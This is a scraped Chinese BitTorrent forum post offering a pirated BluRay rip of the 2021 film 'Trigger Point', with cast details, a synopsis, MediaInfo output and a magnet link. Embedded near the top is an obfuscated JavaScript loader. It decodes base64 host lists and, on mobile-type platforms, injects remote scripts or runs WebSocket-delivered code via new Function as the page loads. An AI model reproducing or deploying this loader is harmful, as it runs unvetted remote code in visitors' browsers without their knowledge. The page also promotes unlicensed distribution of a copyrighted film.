特工追缉令[双语字幕]Trigger.Point.2021.1080p.BluRay.x264.DTS-迅雷下载 5.96GB

版主小s 1月前 329

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x62\x50\x73\x42\x6e\x58\x4f\x42\x73\x4f']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXlxa2RmODc5Zi5hc2xleXR5LmNvbbSxodHRwczovL29oamZrN2pmMjguZ3Nqemxzc3dzLmNvbbQ==','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['b','O']);}:function(){};

◎译  名 特工追缉令 / 一触即发 / 触发点
◎片  名 Trigger Point
◎年  代 2021
◎产  地 加拿大
◎类  别 动作 / 惊悚
◎语  言 英语
◎上映日期 2021-10-10(美国)
◎IMDb链接 https://www.imdb.com/title/tt13382698/
◎豆瓣链接 https://movie.douban.com/subject/35387943/
◎片  长 82分钟
◎导  演 布拉德·特纳 Brad Turner (I) (id:1299669)
◎演  员 巴里·佩珀 Barry Pepper (id:1000075)
       科鲁姆·费奥瑞 Colm Feore (id:1022706)
       伊芙·哈洛 Eve Harlow (id:1251251)
       卡尔洛·罗塔 Carlo Rota (id:1141797)
       杰恩·伊斯特伍德 Jayne Eastwood (id:1086375)
       纳齐恩·康特拉科特 Nazneen Contractor (id:1318273)
       劳拉·范德沃特 Laura Vandervoort (id:1049513)
       蓝宝·桑·法兰克斯 Rainbow Sun Francks (id:1036748)
       格雷格·布瑞克 Greg Bryk (id:1353762)
       Ryan Malcolm Ryan Malcolm (id:1200422)
       胡安·卡洛斯·韦利斯 Juan Carlos Velis (id:1193257)

◎标  签 特工 / 动作 / 犯罪 / 加拿大 / 美国 / 2021 / 惊悚 / 风景好

◎简  介
  尼古拉斯·布拉泽是一位退休的美国特工,曾在政府最黑暗的阴影中工作,这是一支精英“无形”团队的一部分,该团队悄悄带走了世界上一些最糟糕的恶棍。尼古拉斯被指责因为他的原因导致团队的几名成员曝光并被暗杀后,而他却失忆了,被撤职后的他在一个小镇过着简朴的生活,但家里也有一套完善的安全系统。一天,尼古拉斯的前同事埃利亚斯·凯恩找到他,请尼古拉斯帮他把女儿救回来。他无奈地回到了这个危险的世界中,一路上,自己失去一切的秘密逐渐被解开......

  1. ##### MediaInfo ######
  2. General
  3. Unique ID                                : 60173713554394286134129298674729869083 (0x2D450922520A4A2F9E467A04184BDF1B)
  4. Complete name                            : [email protected]
  5. Format                                   : Matroska
  6. Format version                           : Version 4
  7. File size                                : 5.96 GiB
  8. Duration                                 : 1 h 22 min
  9. Overall bit rate                         : 10.4 Mb/s
  10. Movie name                               : Trigger Point
  11. Encoded date                             : UTC 2021-07-25 12:48:47
  12. Writing application                      : mkvmerge v59.0.0 ('Shining Star') 64-bit
  13. Writing library                          : libebml v1.4.2 + libmatroska v1.6.4
  14. Cover                                    : Yes
  15. Attachments                              : cover.jpg
  16. Video
  17. ID                                       : 1
  18. Format                                   : AVC
  19. Format/Info                              : Advanced Video Codec
  20. Format profile                           : [email protected]
  21. Format settings                          : CABAC / 4 Ref Frames
  22. Format settings, CABAC                   : Yes
  23. Format settings, Reference frames        : 4 frames
  24. Codec ID                                 : V_MPEG4/ISO/AVC
  25. Duration                                 : 1 h 22 min
  26. Bit rate                                 : 8 773 kb/s
  27. Width                                    : 1 920 pixels
  28. Height                                   : 804 pixels
  29. Display aspect ratio                     : 2.40:1
  30. Frame rate mode                          : Constant
  31. Frame rate                               : 23.976 (24000/1001/53354) FPS
  32. Color space                              : YUV
  33. Chroma subsampling                       : 4:2:0
  34. Bit depth                                : 8 bits
  35. Scan type                                : Progressive
  36. Bits/(Pixel*Frame)                       : 0.237
  37. Stream size                              : 5.04 GiB (85%)
  38. Writing library                          : x264 core 164 r3065+55M 280faca t_mod_New [(8 & 10)[email protected] X86_64]
  39. Encoding settings                        : cabac=1 / ref=4 / deblock=1:-3:-3 / analyse=0x3:0x133 / me=umh / subme=11 / psy=1 / fade_compensate=0.00 / psy_rd=1.00:0.00 / mixed_ref=1 / me_range=48 / chroma_me=1 / trellis=2 / 8x8dct=1 / cqm=0 / deadzone=21,11 / fast_pskip=0 / chroma_qp_offset=-3 / threads=24 / lookahead_threads=6 / sliced_threads=0 / nr=0 / decimate=0 / interlaced=0 / NTMzNTQ= / bluray_compat=0 / constrained_intra=0 / fgo=0 / bframes=11 / b_pyramid=2 / b_adapt=2 / b_bias=0 / direct=3 / weightb=1 / open_gop=0 / weightp=2 / keyint=240 / keyint_min=1 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / intra_refresh=0 / rc_lookahead=72 / rc=crf / mbtree=0 / crf=17.0000 / qcomp=0.65 / qpmin=0:0:0 / qpmax=69:69:69 / qpstep=4 / vbv_maxrate=62500 / vbv_bufsize=78125 / crf_max=0.0 / nal_hrd=none / filler=0 / NTMzNTQ=LmsMAP37EqsCpk / ip_ratio=1.40 / pb_ratio=1.30 / aq=3:0.80 / aq-sensitivity=10.00 / aq-factor=1.00:1.00:1.00 / aq2=0 / aq3=0
  40. Default                                  : Yes
  41. Forced                                   : No
  42. Audio
  43. ID                                       : 2
  44. Format                                   : DTS
  45. Format/Info                              : Digital Theater Systems
  46. Codec ID                                 : A_DTS
  47. Duration                                 : 1 h 22 min
  48. Bit rate mode                            : Constant
  49. Bit rate                                 : 1 509 kb/s
  50. Channel(s)                               : 6 channels
  51. Channel layout                           : C L R Ls Rs LFE
  52. Sampling rate                            : 48.0 kHz
  53. Frame rate                               : 93.750 FPS (512 SPF)
  54. Bit depth                                : 24 bits
  55. Compression mode                         : Lossy
  56. Stream size                              : 889 MiB (15%)
  57. Language                                 : English
  58. Default                                  : Yes
  59. Forced                                   : No
  60. Text #1
  61. ID                                       : 3
  62. Format                                   : PGS
  63. Muxing mode                              : zlib
  64. Codec ID                                 : S_HDMV/PGS
  65. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs
  66. Duration                                 : 1 h 18 min
  67. Bit rate                                 : 34.6 kb/s
  68. Count of elements                        : 1279
  69. Stream size                              : 19.3 MiB (0%)
  70. Title                                    : chs&eng
  71. Language                                 : Chinese
  72. Default                                  : Yes
  73. Forced                                   : No
  74. Text #2
  75. ID                                       : 4
  76. Format                                   : PGS
  77. Muxing mode                              : zlib
  78. Codec ID                                 : S_HDMV/PGS
  79. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs
  80. Duration                                 : 1 h 18 min
  81. Bit rate                                 : 34.8 kb/s
  82. Count of elements                        : 1279
  83. Stream size                              : 19.4 MiB (0%)
  84. Title                                    : cht&eng
  85. Language                                 : Chinese
  86. Default                                  : No
  87. Forced                                   : No
  88. Text #3
  89. ID                                       : 5
  90. Format                                   : PGS
  91. Muxing mode                              : zlib
  92. Codec ID                                 : S_HDMV/PGS
  93. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs
  94. Duration                                 : 1 h 18 min
  95. Bit rate                                 : 19.8 kb/s
  96. Count of elements                        : 1277
  97. Stream size                              : 11.1 MiB (0%)
  98. Title                                    : chs
  99. Language                                 : Chinese
  100. Default                                  : No
  101. Forced                                   : No
  102. Text #4
  103. ID                                       : 6
  104. Format                                   : PGS
  105. Muxing mode                              : zlib
  106. Codec ID                                 : S_HDMV/PGS
  107. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs
  108. Duration                                 : 1 h 18 min
  109. Bit rate                                 : 19.9 kb/s
  110. Count of elements                        : 1277
  111. Stream size                              : 11.1 MiB (0%)
  112. Title                                    : cht
  113. Language                                 : Chinese
  114. Default                                  : No
  115. Forced                                   : No
  116. Text #5
  117. ID                                       : 7
  118. Format                                   : PGS
  119. Muxing mode                              : zlib
  120. Codec ID                                 : S_HDMV/PGS
  121. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs
  122. Duration                                 : 1 h 21 min
  123. Bit rate                                 : 59.4 kb/s
  124. Count of elements                        : 1887
  125. Stream size                              : 34.7 MiB (1%)
  126. Title                                    : eng
  127. Language                                 : English
  128. Default                                  : No
  129. Forced                                   : No
  130. Menu
  131. 00:00:00.000                             : Chapter 01
  132. 00:05:52.727                             : Chapter 02
  133. 00:13:45.115                             : Chapter 03
  134. 00:20:47.037                             : Chapter 04
  135. 00:27:39.115                             : Chapter 05
  136. 00:37:21.864                             : Chapter 06
  137. 00:42:08.984                             : Chapter 07
  138. 00:47:56.164                             : Chapter 08
  139. 00:55:25.780                             : Chapter 09
  140. 01:02:33.416                             : Chapter 10
  141. 01:10:43.364                             : Chapter 11
  142. 01:18:45.345                             : Chapter 12


TAGS 动作 惊悚

磁力链:
  • magnet:?xt=urn:btih:3809B3FE6C73BECD4E151A8C353289FA806D847D
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回